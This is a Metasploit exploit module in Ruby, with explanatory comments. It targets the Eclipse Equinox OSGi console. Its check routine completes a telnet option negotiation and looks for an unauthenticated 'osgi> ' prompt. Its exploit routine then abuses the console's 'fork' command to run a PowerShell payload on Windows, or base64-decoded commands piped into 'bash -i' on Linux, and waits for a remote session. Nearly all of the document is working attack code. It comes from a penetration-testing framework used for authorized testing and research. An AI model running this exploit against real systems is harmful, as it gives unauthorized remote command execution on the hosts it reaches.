GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/misc/osgi_console_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'base64'
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell

  # Shorthand for the telnet protocol constants (IAC, WILL, DO, SB, SE, OPT_*)
  # used to answer the console's option negotiation in #check and #exec_command.
  TELNET_IAC = Msf::Exploit::Remote::Telnet

  # Module metadata and options.
  #
  # The service is the Equinox OSGi console reached over a plain TCP
  # connection (Msf::Exploit::Remote::Tcp); its 'fork' command is what runs the
  # payload (see #exec_command and #execute_command). Two targets are declared:
  # Linux delivers the payload through the bourne CmdStager flavor, Windows
  # through a PowerShell command built by cmd_psh_payload.
  #
  # SRVHOST/SRVPORT/SSL/SSLCert/URIPATH are deregistered because nothing in
  # this module reads them. TIME_WAIT bounds how long #exploit polls for a
  # session after the command has been sent.
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Eclipse Equinox OSGi Console Command Execution',
        'Description' => %q{
          Exploit Eclipse Equinox OSGi (Open Service Gateway initiative) console
          'fork' command to execute arbitrary commands on the remote system.
        },
        'Author' => [
          'Quentin Kaiser <[email protected]>'
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['URL', 'https://www.eclipse.org/equinox/documents/quickstart-framework.php']
        ],
        'Platform' => %w{linux win},
        'Arch' => [ARCH_ARMLE, ARCH_AARCH64, ARCH_X86, ARCH_X64],
        'Targets' => [
          [ 'Linux (Bash Payload)', { 'Platform' => 'linux' } ],
          [ 'Windows (Powershell Payload)', { 'Platform' => 'win' } ]
        ],
        'CmdStagerFlavor' => [ 'bourne' ],
        'DisclosureDate' => '2018-02-13',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
    deregister_options('SRVHOST', 'SRVPORT', 'SSL', 'SSLCert', 'URIPATH')
    register_options([
      OptInt.new('TIME_WAIT', [ true, 'Time to wait for payload to be executed', 20])
    ])
  end

  # Probes the service and reports CheckCode::Vulnerable only when the bare
  # console prompt comes back.
  #
  # Sequence: connect and read the first banner; if it is byte-for-byte the
  # telnet option negotiation (WILL ECHO, WILL SGA, DO NAWS, DO TTYPE), answer
  # with a TTYPE subnegotiation naming "xterm-256color" and read again; then
  # disconnect. Anything other than the exact "osgi> " prompt — including nil
  # when nothing was read — is reported as CheckCode::Safe. The get_once calls
  # are made without an explicit timeout; the mixin default applies.
  #
  # @return [Msf::Exploit::CheckCode] Vulnerable or Safe
  def check
    connect
    res = sock.get_once
    # Only reply to the negotiation when the banner matches it exactly;
    # otherwise res keeps whatever was first read.
    if res == TELNET_IAC::IAC + TELNET_IAC::WILL + TELNET_IAC::OPT_ECHO + \
              TELNET_IAC::IAC + TELNET_IAC::WILL + TELNET_IAC::OPT_SGA + \
              TELNET_IAC::IAC + TELNET_IAC::DO + TELNET_IAC::OPT_NAWS + \
              TELNET_IAC::IAC + TELNET_IAC::DO + TELNET_IAC::OPT_TTYPE
      # terminal type 'xterm-256color' = \x78\x74\x65\x72\x6D\x2D\x32\x35\x36\x63\x6F\x6C\x6F\x72
      sock.put(TELNET_IAC::IAC + TELNET_IAC::SB + TELNET_IAC::OPT_TTYPE + \
               "\x00xterm-256color" + TELNET_IAC::IAC + TELNET_IAC::SE)
      res = sock.get_once
    end
    disconnect
    # Strict equality: a prompt preceded by extra banner text, or a response
    # split across reads, does not match and is reported as Safe.
    if res && res == "osgi> "
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end

  # Runs the module: re-runs #check, sends the platform-specific command, then
  # polls for a session.
  #
  # Windows target: a PowerShell command from cmd_psh_payload is passed to
  # #exec_command inside the console's 'fork' command. Linux target: the bourne
  # CmdStager is run via execute_cmdstager, which presumably invokes
  # #execute_command for each staged command — confirm against the CmdStager
  # mixin. Afterwards waits up to TIME_WAIT seconds, polling session_created?
  # once per second.
  #
  # Failure::NoTarget is raised through fail_with when #check is not
  # Vulnerable; timeout and connection errors become Failure::Unknown.
  def exploit
    begin
      print_status("Accessing the OSGi console ...")

      unless check == Exploit::CheckCode::Vulnerable
        fail_with(Failure::NoTarget, "#{peer} - Failed to access the OSGi console")
      end

      if target['Platform'] == "win" then
        exec_command("fork \"#{cmd_psh_payload(payload.encoded, payload_instance.arch.first, { encode_final_payload: true, remove_comspec: true })}\"")
      else
        execute_cmdstager({ :flavor => :bourne })
      end

      print_status("#{rhost}:#{rport} - Waiting for session...")

      # Bounded wait: at most TIME_WAIT one-second polls.
      (datastore['TIME_WAIT']).times do
        Rex.sleep(1)
        # Success! session is here!
        break if session_created?
      end
    rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e
      # Network-level failures are surfaced with the original message.
      fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{e.message}")
    ensure
      # #exec_command connects but never disconnects; close that socket here
      # on every exit path.
      disconnect
    end
  end

  # Sends one command line to the console and asks the console to end the
  # session.
  #
  # Repeats the telnet negotiation done in #check (duplicated rather than
  # shared), then writes cmd followed by CRLF, reads the reply, sends the
  # console's 'disconnect' command, reads again and answers "y" — presumably a
  # confirmation prompt; the prompt text itself is not visible here. The
  # replies are read and discarded. The socket stays open; #exploit's ensure
  # block closes it.
  #
  # @param cmd [String] a complete console command line; both callers pass a
  #   'fork "..."' command
  def exec_command(cmd)
    connect
    res = sock.get_once
    if res == TELNET_IAC::IAC + TELNET_IAC::WILL + TELNET_IAC::OPT_ECHO + \
              TELNET_IAC::IAC + TELNET_IAC::WILL + TELNET_IAC::OPT_SGA + \
              TELNET_IAC::IAC + TELNET_IAC::DO + TELNET_IAC::OPT_NAWS + \
              TELNET_IAC::IAC + TELNET_IAC::DO + TELNET_IAC::OPT_TTYPE
      sock.put(TELNET_IAC::IAC + TELNET_IAC::SB + TELNET_IAC::OPT_TTYPE + \
               "\x00xterm-256color" + TELNET_IAC::IAC + TELNET_IAC::SE)
      res = sock.get_once
    end
    print_status("Exploiting...")
    # Command and control replies travel in cleartext on this connection.
    sock.put("#{cmd}\r\n")
    res = sock.get
    sock.put("disconnect\r\n")
    res = sock.get
    sock.put("y\r\n")
  end

  # CmdStager callback: wraps one staged command in the console's 'fork'
  # command.
  #
  # cmd is base64-encoded with the encoder's line breaks stripped (the gsub),
  # then decoded and piped into bash on the target. The brace form is the
  # author's workaround for Runtime.exec() argument handling, per the note
  # below.
  #
  # @param cmd [String] shell command produced by the stager
  # @param opts [Hash] not read here; kept for the callback signature
  def execute_command(cmd, opts = {})
    cmd_b64 = Base64.encode64(cmd).gsub(/\s+/, "")
    # Runtime.getRuntime().exec() workaround on Linux. Requires bash.
    exec_command("fork \"bash -c {echo,#{cmd_b64}}|{base64,-d}|{bash,-i}\"")
  end
end